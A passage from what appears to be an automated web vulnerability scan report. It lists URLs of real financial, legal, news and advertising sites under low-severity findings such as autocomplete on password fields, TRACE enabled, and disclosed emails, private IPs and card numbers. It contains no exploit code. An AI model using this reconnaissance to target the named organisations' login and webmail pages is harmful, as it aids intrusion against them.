14.50. http://ad.yieldmanager.com/iframe3

14.51. http://ad.yieldmanager.com/imp

14.52. http://ad.yieldmanager.com/pixel

14.53. http://ad.yieldmanager.com/unpixel

14.54. http://ads.adbrite.com/adserver/vdi/742697

14.55. http://ads.cpxadroit.com/adserver/10-794ZA8LJ0UA05.cpxad

14.56. http://ads.revsci.net/adserver/ako

14.57. http://ads.revsci.net/adserver/ako

14.58. http://ads.revsci.net/adserver/ako

14.59. http://ads.revsci.net/adserver/ako

14.60. http://ads.revsci.net/adserver/ako

14.61. http://ads.revsci.net/adserver/ako

14.62. http://ads.revsci.net/adserver/ako

14.63. http://ads1.revenue.net/j

14.64. http://ads1.revenue.net/load/227245/index.html

14.65. http://akatracking.esearchvision.com/esi/redirect.html

14.66. http://akatracking.esearchvision.com/esi/redirect2.html

14.67. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9

14.68. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php

14.69. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php

14.70. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php

14.71. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php

14.72. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php

14.73. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php

14.74. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php

14.75. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php

14.76. http://b.scorecardresearch.com/b

14.77. http://bing.com/

14.78. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.79. http://cf.addthis.com/red/p.json

14.80. http://core.insightexpressai.com/adServer/adServerESI.aspx

14.81. http://cspix.media6degrees.com/orbserv/hbpix

14.82. http://da.newstogram.com/hg.php

14.83. http://domdex.com/f

14.84. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json

14.85. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

14.86. http://engine.cmmeglobal.com/v1/page-view

14.87. http://idpix.media6degrees.com/orbserv/hbpix

14.88. http://js.revsci.net/gateway/gw.js

14.89. http://lfov.net/webrecorder/g/chimera.js

14.90. http://lfov.net/webrecorder/js/listen.js

14.91. http://lfov.net/webrecorder/w

14.92. http://marketing.csscorp.com/acton/bn/1090/visitor.gif

14.93. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp

14.94. http://meter-svc.nytimes.com/meter.js

14.95. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

14.96. http://odb.outbrain.com/utils/get

14.97. http://odb.outbrain.com/utils/ping.html

14.98. http://overseebroad.d.chango.com/c/t.js

14.99. http://pepperhamilton.com/

14.100. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

14.101. http://pix04.revsci.net/D08734/a1/0/0/0.gif

14.102. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js

14.103. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js

14.104. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js

14.105. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js

14.106. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js

14.107. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js

14.108. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js

14.109. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js

14.110. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js

14.111. http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js

14.112. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js

14.113. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js

14.114. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js

14.115. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js

14.116. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js

14.117. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js

14.118. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js

14.119. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js

14.120. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js

14.121. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js

14.122. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js

14.123. http://pixel.33across.com/ps/

14.124. http://pixel.quantserve.com/pixel

14.125. http://privatemoneytalk.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php

14.126. http://r.turn.com/r/bd

14.127. http://r.turn.com/r/beacon

14.128. http://r.turn.com/server/pixel.htm

14.129. http://segments.adap.tv/data/

14.130. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

14.131. https://services.sungarddx.com/default.aspx

14.132. http://tags.bluekai.com/site/668

14.133. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

14.134. http://track.ft.com/track/track.js

14.135. http://translate.googleapis.com/translate_a/t

14.136. http://va.px.invitemedia.com/pixel

14.137. https://virtualoffice.tuckerellis.com/

14.138. http://wt.o.nytimes.com/dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif

14.139. http://wt.o.nytimes.com/dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif

14.140. https://ww3.janus.com/favicon.ico

14.141. http://www.apolloglobal.us/

14.142. http://www.apolloglobal.us/index.php

14.143. http://www.beneschlaw.com/

14.144. http://www.beneschlaw.com/FCWSite/Include/spamproof.aspx

14.145. http://www.csscorp.com/

14.146. http://www.digiware.net/

14.147. http://www.gobignetwork.com/funding

14.148. http://www.mimecast.com/

14.149. http://www.mimecast.com/About-us/Contact-us/

14.150. http://www.mimecast.com/What-we-offer/

14.151. http://www.moritthock.com/

14.152. http://www.moritthock.com/index.php/representative_transactions

14.153. http://www.moritthock.com/index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc

14.154. http://www.nytimes.com/adx/bin/adx_remote.html

14.155. http://www.porterwright.com/

14.156. http://www.porterwright.com/favicon.ico

14.157. https://www.wellsfargo.com/jump/theprivatebank/index

15. Password field with autocomplete enabled

15.1. https://cle-files.tuckerellis.com/

15.2. https://cle-files.tuckerellis.com/register

15.3. https://investor.kkr.com/Login.aspx

15.4. https://investor.kkr.com/Login.aspx

15.5. https://investor.kkr.com/Login.aspx

15.6. https://investor.kkr.com/Login.aspx

15.7. http://media.ft.com/h/subs.html

15.8. http://media.ft.com/j/common.js

15.9. https://myaccount.nytimes.com/auth/login

15.10. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html

15.11. https://secure.reportingsystem.com/TPG/index.cfm

15.12. https://secure.reportingsystem.com/carlyle/

15.13. https://webmail-us.mimecast.com/webMail/login.jsp

15.14. http://www.digiware.net/

15.15. http://www.gobignetwork.com/funding

15.16. http://www.huroncapital.com/secure/

15.17. http://www.pillsburylaw.com/

15.18. http://www.pillsburylaw.com/index.cfm

15.19. http://www.pillsburylaw.com/index.cfm

15.20. http://www.privateequityinfo.com/

15.21. http://www.privateequityinfo.com/forgotpassword.php

15.22. http://www.privateequityinfo.com/product_details.php

15.23. http://www.soundpatheview.com/

16. Source code disclosure

16.1. http://graphics8.nytimes.com/js/adx/googleads.js

16.2. http://graphics8.nytimes.com/js/app/community/V3/commentsTemplates.js

16.3. http://graphics8.nytimes.com/js/app/community/V3/commonTemplates.js

16.4. http://graphics8.nytimes.com/js/app/community/V3/recommender.js

16.5. http://graphics8.nytimes.com/js/app/lib/NYTD/0.0.1/template.js

16.6. http://graphics8.nytimes.com/js/app/timespeople/activities/1.6/activities.build.js

16.7. http://graphics8.nytimes.com/js/app/timespeople/toolbar/1.7/toolbar.build.min.js

16.8. http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js

16.9. https://myaccount.nytimes.com/js/adx/googleads.js

16.10. https://myaccount.nytimes.com/js/app/lib/NYTD/0.0.1/template.js

17. Referer-dependent response

17.1. http://ad.yieldmanager.com/imp

17.2. http://ads.adbrite.com/adserver/vdi/742697

17.3. http://adserving.cpxinteractive.com/st

17.4. http://www.facebook.com/plugins/like.php

18. Cross-domain POST

18.1. http://privatemoneytalk.com/

18.2. http://privatemoneytalk.com/

18.3. http://www.vcgate.com/Private-Equity.htm

18.4. http://www.vcgate.com/favicon.ico

18.5. http://www.vcgate.com/favicon.ico

18.6. http://www.vcgate.com/favicon.ico

18.7. http://www.vcgate.com/favicon.ico

18.8. http://www.vcgate.com/favicon.ico

18.9. http://www.vcgate.com/favicon.ico

19. Cross-domain Referer leakage

19.1. http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3

19.2. http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871

19.3. http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260

19.4. http://ad.doubleclick.net/adj/fbn

19.5. http://ad.doubleclick.net/adj/fbn/markets

19.6. http://ad.doubleclick.net/adj/fbn/markets

19.7. http://ad.turn.com/server/ads.js

19.8. http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity

19.9. http://ad.yieldmanager.com/pixel

19.10. http://admeld.adnxs.com/usersync

19.11. http://ads.adsonar.com/adserving/getAds.jsp

19.12. http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

19.13. http://ads1.revenue.net/j

19.14. http://cm.g.doubleclick.net/pixel

19.15. http://cm.g.doubleclick.net/pixel

19.16. http://cm.g.doubleclick.net/pixel

19.17. http://googleads.g.doubleclick.net/pagead/ads

19.18. http://googleads.g.doubleclick.net/pagead/ads

19.19. http://googleads.g.doubleclick.net/pagead/ads

19.20. http://googleads.g.doubleclick.net/pagead/ads

19.21. http://googleads.g.doubleclick.net/pagead/ads

19.22. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js

19.23. http://maps.google.com/maps

19.24. http://pepperhamilton.com/

19.25. http://pixel.invitemedia.com/admeld_sync

19.26. http://privatemoneytalk.com/

19.27. http://securelab.digiware.net/

19.28. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros

19.29. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

19.30. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

19.31. https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp

19.32. https://ww3.janus.com/advisor/about-janus

19.33. http://www.apolloglobal.us/index.php

19.34. http://www.butlerrubin.com/web/br.nsf/index

19.35. http://www.digiware.net/index.php

19.36. http://www.facebook.com/plugins/like.php

19.37. http://www.foxbusiness.com/static/all/js/ad.js

19.38. http://www.foxbusiness.com/static/all/js/head.js

19.39. http://www.google.com/search

19.40. http://www.google.com/search

19.41. http://www.google.com/search

19.42. http://www.google.com/search

19.43. http://www.google.com/search

19.44. http://www.google.com/search

19.45. http://www.google.com/search

19.46. http://www.google.com/search

19.47. http://www.google.com/search

19.48. http://www.google.com/search

19.49. http://www.google.com/search

19.50. http://www.google.com/search

19.51. http://www.google.com/search

19.52. http://www.google.com/search

19.53. http://www.google.com/search

19.54. http://www.google.com/search

19.55. http://www.google.com/search

19.56. http://www.pomerantzlaw.com/attorneys.html

19.57. http://www.pomerantzlaw.com/cases.html

19.58. http://www.provequity.com/about_us/index.asp

19.59. http://www.provequity.com/portfolio/index.asp

19.60. http://www.provequity.com/regions/index.asp

19.61. http://www.provequity.com/team/index.asp

20. Cross-domain script include

20.1. http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

20.2. http://ads1.revenue.net/j

20.3. http://googleads.g.doubleclick.net/pagead/ads

20.4. http://googleads.g.doubleclick.net/pagead/ads

20.5. http://investmentfirmsdirect.com/

20.6. http://livetechtv.com/survey/c/indexns.html

20.7. http://pepperhamilton.com/

20.8. http://privatemoneytalk.com/

20.9. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros

20.10. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

20.11. https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp

20.12. http://wolfgreenfield.com/

20.13. http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

20.14. http://www.butlerrubin.com/web/br.nsf/index

20.15. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

20.16. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

20.17. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

20.18. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

20.19. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

20.20. http://www.carlyle.com/

20.21. http://www.carlyle.com/Contact/item7607.html

20.22. http://www.csscorp.com/

20.23. http://www.csscorp.com/contact-us/general-enquiry.php

20.24. http://www.csscorp.com/page-not-found.php

20.25. http://www.elawmarketing.com/about

20.26. http://www.elawmarketing.com/about/clients

20.27. http://www.elawmarketing.com/about/staff

20.28. http://www.elawmarketing.com/contact-us

20.29. http://www.elawmarketing.com/resources/reports/top-10-seo-best-practices-law-firm-websites-0

20.30. http://www.elawmarketing.com/services/websites

20.31. http://www.facebook.com/plugins/like.php

20.32. http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/

20.33. http://www.gobignetwork.com/funding

20.34. http://www.korteco.com/live-project

20.35. http://www.mimecast.com/About-us/Contact-us/

20.36. http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

20.37. http://www.pomerantzlaw.com/attorneys.html

20.38. http://www.pomerantzlaw.com/cases.html

20.39. http://www.pomerantzlaw.com/contact-us.html

20.40. http://www.pomerantzlaw.com/practice-areas.html

20.41. http://www.pomerantzlaw.com/the-firm.html

20.42. http://www.privateequityinfo.com/

20.43. http://www.privateequityinfo.com/forgotpassword.php

20.44. http://www.privateequityinfo.com/product_details.php

20.45. http://www.providenceequitypartners.com/

20.46. http://www.soundpatheview.com/

20.47. http://www.vcgate.com/Private-Equity.htm

20.48. http://www.vcgate.com/favicon.ico

20.49. http://www.vcprodatabase.com/

20.50. http://www.vcprodatabase.com/favicon.ico

21. TRACE method is enabled

21.1. http://convctr.overture.com/

21.2. http://investmentfirmsdirect.com/

21.3. http://media.ft.com/

21.4. http://secure-us.imrworldwide.com/

21.5. http://stats.ft.com/

21.6. http://webezines.kwithost.com/

21.7. http://www.bergerkahn.com/

21.8. http://www.butlerrubin.com/

21.9. http://www.dmoc.com/

21.10. http://www.hbsr.com/

21.11. http://www.opalgroup.net/

21.12. http://www.privateequityinfo.com/

21.13. http://www.tuckerellis.com/

22. Email addresses disclosed

22.1. http://ads.adbrite.com/adserver/vdi/742697

22.2. http://ads.foxnews.com/js/omtr_code.js

22.3. https://ams-legal.net/support/Login.asp

22.4. http://axley.com/

22.5. http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json

22.6. http://dealbook.nytimes.com/

22.7. http://dealbook.nytimes.com/2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/

22.8. http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/

22.9. http://dealbook.nytimes.com/2011/05/03/onex-sells-husky-international-for-2-1-billion/

22.10. http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/

22.11. http://dealbook.nytimes.com/2011/05/06/how-well-did-warner-musics-investors-do/

22.12. http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/

22.13. http://dealbook.nytimes.com/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/

22.14. http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/

22.15. http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/

22.16. http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/

22.17. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/

22.18. http://dealbook.nytimes.com/category/main-topics/private-equity/

22.19. http://dealbook.nytimes.com/category/main-topics/venture-capital/

22.20. http://digiware.com/contact.htm

22.21. http://digiware.com/privacy.htm

22.22. http://honey.digiware.net/

22.23. http://labs.csscorp.com/site/js/cform_popup.js

22.24. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js

22.25. http://media.ft.com/j/FTTrack2.js

22.26. http://securelab.digiware.net/

22.27. https://services.sungarddx.com/default.aspx

22.28. http://translate.googleapis.com/translate_a/t

22.29. http://translate.googleapis.com/translate_a/t

22.30. http://translate.googleapis.com/translate_a/t

22.31. http://w.sharethis.com/button/buttons.js

22.32. https://ww3.janus.com/advisor/js/modalbox.js

22.33. https://ww3.janus.com/advisor/js/validation.js

22.34. http://www.ams-legal.com/services_and_support.asp

22.35. http://www.apolloglobal.us/templates/global/js/roksameheight.js

22.36. http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

22.37. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

22.38. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

22.39. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

22.40. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

22.41. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

22.42. http://www.condorlabs.net/wp-content/themes/idream/js/jquery.pngFix.js

22.43. http://www.conferenceservers.com/brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe

22.44. http://www.csscorp.com/js/mega_dropdown.js

22.45. http://www.digiware.net/formularios/form3.php

22.46. http://www.foxbusiness.com/static/all/js/jquery.plugins.js

22.47. http://www.friedkanelaw.com/Attorneys/jbh_main.htm

22.48. http://www.gobignetwork.com/content/js/jquery/jquery.hoverIntent.js

22.49. http://www.google.com/search

22.50. http://www.google.com/search

22.51. http://www.hbsr.com/contact_us/index

22.52. http://www.huroncapital.com/secure/

22.53. http://www.korteco.com/ftp-info

22.54. http://www.milbank.com/en/Alumni/

22.55. http://www.mimecast.com/

22.56. http://www.mimecast.com/About-us/Contact-us/

22.57. http://www.mimecast.com/Customers/

22.58. http://www.mimecast.com/How-to-buy/

22.59. http://www.mimecast.com/News-and-views/Press-releases/

22.60. http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

22.61. http://www.mimecast.com/Scripts/howtobuy.js

22.62. http://www.mimecast.com/Scripts/jquery.colorbox.min.js

22.63. http://www.mimecast.com/Templates/Pages/images/icons/desktop.png

22.64. http://www.mimecast.com/What-we-offer/

22.65. http://www.moritthock.com/

22.66. http://www.opalgroup.net/conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php

22.67. https://www.opalgroup.net/js/chainedselects.js

22.68. http://www.pepperlaw.com/

22.69. http://www.pepperlaw.com/contact.aspx

22.70. http://www.pepperlaw.com/contact_Comments.aspx

22.71. http://www.pepperlaw.com/ourlawyers.aspx

22.72. http://www.pepperlaw.com/publications.aspx

22.73. http://www.pillsburylaw.com/index.cfm

22.74. http://www.pillsburylaw.com/scripts/jquery.cookie.js

22.75. http://www.pillsburylaw.com/scripts/jquery.dimensions.js

22.76. http://www.pomerantzlaw.com/attorneys.html

22.77. http://www.pomerantzlaw.com/attorneys.html

22.78. http://www.pomerantzlaw.com/cases.html

22.79. http://www.pomerantzlaw.com/contact-us.html

22.80. http://www.privateequityinfo.com/

22.81. http://www.privateequityinfo.com/forgotpassword.php

22.82. http://www.privateequityinfo.com/product_details.php

22.83. http://www.provequity.com/news/releases/SRA%20Press%20Release%204%201%2011.PDF

22.84. http://www.soundpatheview.com/

22.85. http://www.stroock.com/

22.86. http://www.tpg.com/contact.html

22.87. http://www.tuckerellis.com/attorneys/index

22.88. http://www.tuckerellis.com/attorneys/k-anderson

22.89. http://www.vcprodatabase.com/favicon.ico

23. Private IP addresses disclosed

23.1. http://connect.facebook.net/en_US/all.js

23.2. http://connect.facebook.net/en_US/all.js

23.3. http://meter-svc.nytimes.com/meter.js

23.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.5. http://www.facebook.com/extern/login_status.php

23.6. http://www.facebook.com/extern/login_status.php

23.7. http://www.facebook.com/extern/login_status.php

23.8. http://www.facebook.com/extern/login_status.php

23.9. http://www.facebook.com/extern/login_status.php

23.10. http://www.facebook.com/extern/login_status.php

23.11. http://www.facebook.com/extern/login_status.php

23.12. http://www.facebook.com/extern/login_status.php

23.13. http://www.facebook.com/plugins/like.php

23.14. http://www.facebook.com/plugins/like.php

23.15. http://www.facebook.com/plugins/like.php

23.16. http://www.facebook.com/plugins/like.php

23.17. http://www.facebook.com/plugins/like.php

23.18. http://www.google.com/sdch/vD843DpA.dct

24. Credit card numbers disclosed

24.1. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

24.2. http://graphics8.nytimes.com/css/0.1/screen/common/modules/scrollbox.css

24.3. http://www.carlyle.com/Contact/item7607.html

25. Robots.txt file

25.1. http://ad.doubleclick.net/clk

25.2. http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity

25.3. http://b.scorecardresearch.com/b

25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.5. http://by.optimost.com/counter/553/-/129/event.js

25.6. http://convctr.overture.com/images/cc/cc.gif

25.7. http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/

25.8. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

25.9. http://engine.cmmeglobal.com/v1/page-view

25.10. http://feeds.feedburner.com/CrmRadar

25.11. http://generalatlantic.com/

25.12. http://googleads.g.doubleclick.net/pagead/ads

25.13. http://graphics8.nytimes.com/css/blogs/3.1/screen/themes/dealbook/style.css

25.14. http://investmentfirmsdirect.com/

25.15. http://l.addthiscdn.com/live/t00/250lo.gif

25.16. http://media.ft.com/h/subs.html

25.17. http://pagead2.googlesyndication.com/pagead/imgad

25.18. http://privatemoneytalk.com/

25.19. http://pubads.g.doubleclick.net/gampad/ads

25.20. http://www.beneschlaw.com/

25.21. http://www.dmoc.com/sites/default/files/home-tetons.jpg

25.22. http://www.facebook.com/plugins/like.php

25.23. http://www.ft.com/indepth/privateequity

25.24. http://www.google-analytics.com/__utm.gif

25.25. http://www.huroncapital.com/

25.26. http://www.managedfuturespecialist.com/

25.27. http://www.milbank.com/

25.28. http://www.nytimes.com/adx/bin/adx_remote.html

25.29. http://www.opalgroup.net/google/ais2010.html

25.30. http://www.pillsburylaw.com/

25.31. http://www.porterwright.com/

25.32. http://www.privateequityinfo.com/

25.33. http://www.privatemoneytalk.com/

25.34. http://www.stroock.com/

25.35. http://www.vcgate.com/Private-Equity.htm

25.36. http://www.vcprodatabase.com/

26. Cacheable HTTPS response

26.1. https://ams-legal.net/support/blank.htm

26.2. https://ams-legal.net/tuckerellis/

26.3. https://ams-legal.net/tuckerellis/Image.asp

26.4. https://ams-legal.net/tuckerellis/blank.htm

26.5. https://cle-files.tuckerellis.com/

26.6. https://cle-files.tuckerellis.com/password_reset

26.7. https://cle-files.tuckerellis.com/register

26.8. https://investor.kkr.com/Recovery.aspx

26.9. https://investor.kkr.com/investor/login.html

26.10. https://personal.vanguard.com/us/funds/snapshot

26.11. https://services.sungarddx.com/admin/GetExternMedia.aspx

26.12. https://services.sungarddx.com/common/js/AdminFunctions.asp

26.13. https://virtualoffice.tuckerellis.com/

26.14. https://webmail-us.mimecast.com/

26.15. https://ww3.janus.com/advisor/templates/blank.jsp

26.16. https://www.opalgroup.net/forms/info_request/info_request.php

26.17. https://www.opalgroup.net/forms/register/register.php

26.18. https://www.opalgroup.net/forms/suggestions/suggestions.php

26.19. https://www.usaa.com/favicon.ico

26.20. https://www.wellsfargo.com/jump/theprivatebank/index

26.21. https://www.wellsfargo.com/pi_action/thePrivateBankFormAction

26.22. https://www.wellsfargo.com/theprivatebank/

26.23. https://www.wellsfargo.com/theprivatebank/contact_us

27. HTML does not specify charset

27.1. http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3

27.2. http://ad.amtk-media.com/iframe

27.3. http://ads1.revenue.net/j

27.4. http://amch.questionmarket.com/adscgen/sta.php

27.5. https://ams-legal.net/support/Login.asp

27.6. https://ams-legal.net/support/LoginProcess.asp

27.7. https://ams-legal.net/support/blank.htm

27.8. https://ams-legal.net/support/default.asp

27.9. https://ams-legal.net/tuckerellis/

27.10. https://ams-legal.net/tuckerellis/Login.asp

27.11. https://ams-legal.net/tuckerellis/LoginProcess.asp

27.12. https://ams-legal.net/tuckerellis/blank.htm

27.13. https://ams-legal.net/tuckerellis/default.asp

27.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.15. http://dealbook.nytimes.com/svc/timespeople/bell.html

27.16. https://investor.kkr.com/investor/login.html

27.17. http://js.adsonar.com/js/pass.html

27.18. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp

27.19. http://odb.outbrain.com/utils/ping.html

27.20. http://ping.chartbeat.net/ping

27.21. https://services.sungarddx.com/admin/GetExternMedia.aspx

27.22. https://services.sungarddx.com/common/js/AdminFunctions.asp

27.23. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros

27.24. http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html

27.25. http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

27.26. http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

27.27. http://topics.nytimes.com/svc/timespeople/bell.html

27.28. http://wd.sharethis.com/api/getCount2.php

27.29. https://webmail-us.mimecast.com/

27.30. https://webmail-us.mimecast.com/webMail/login.jsp

27.31. http://webmail.tuckerellis.com/

27.32. http://www.apolloic.com/public/home.asp

27.33. http://www.carlyle.com/favicon.ico

27.34. http://www.conferenceservers.com/browser/proxy.asp

27.35. http://www.managedfuturespecialist.com/favicon.ico

27.36. http://www.milbank.com/

27.37. http://www.milbank.com/clientweb/

27.38. http://www.milbank.com/clientweb/MTHM_main_bot.html

27.39. http://www.milbank.com/clientweb/MTHM_main_top.html

27.40. http://www.moritthock.com/index.php

27.41. http://www.nytimes.com/adx/bin/adx_remote.html

27.42. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

28. Content type incorrectly stated

28.1. http://207.56.166.97/favicon.ico

28.2. http://207.56.166.97/javascript/c_smartmenus.js

28.3. http://ads1.revenue.net/j

28.4. http://amch.questionmarket.com/adscgen/sta.php

28.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.6. http://cdn.gotraffic.net/v/20110510_141513/images/exclusive_bar_bg_12x20.png

28.7. http://cdn.gotraffic.net/v/20110510_141513/images/icons/chevrons.gif

28.8. http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json

28.9. http://cgiwsc.enhancedsitebuilder.com/extras/res/js/date.js

28.10. http://content.dl-rms.com/rms/3882/nodetag.js

28.11. http://dealbook.nytimes.com/favicon.ico

28.12. http://dealbook.nytimes.com/proxy/

28.13. http://dealbook.nytimes.com/svc/community/V2/requestHandler

28.14. http://dealbook.nytimes.com/svc/timespeople/bell.html

28.15. http://j.maxmind.com/app/geoip.js

28.16. http://kona40.kontera.com/KonaGet.js

28.17. http://labs.csscorp.com/site/favicon.ico

28.18. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp

28.19. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

28.20. http://rapidssl-aia.geotrust.com/rapidssl.crt

28.21. https://services.sungarddx.com/admin/GetExternMedia.aspx

28.22. https://services.sungarddx.com/common/js/AdminFunctions.asp

28.23. http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

28.24. http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

28.25. http://topics.nytimes.com/svc/timespeople/bell.html

28.26. http://translate.googleapis.com/translate_a/t

28.27. http://trc.taboolasyndication.com/bloomberg/trc/2/json

28.28. http://wd.sharethis.com/api/getCount2.php

28.29. http://webezines.kwithost.com/sx25Feed.php

28.30. http://wolfgreenfield.com/favicon.ico

28.31. https://ww3.janus.com/advisor/images/st_facebook_footer.gif

28.32. https://ww3.janus.com/advisor/images/st_facebook_header.gif

28.33. https://ww3.janus.com/advisor/images/st_twitter_footer.gif

28.34. https://ww3.janus.com/advisor/images/st_twitter_header.gif

28.35. http://www.beneschlaw.com/files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif

28.36. http://www.butlerrubin.com/web/br.nsf/br_logo.jpg

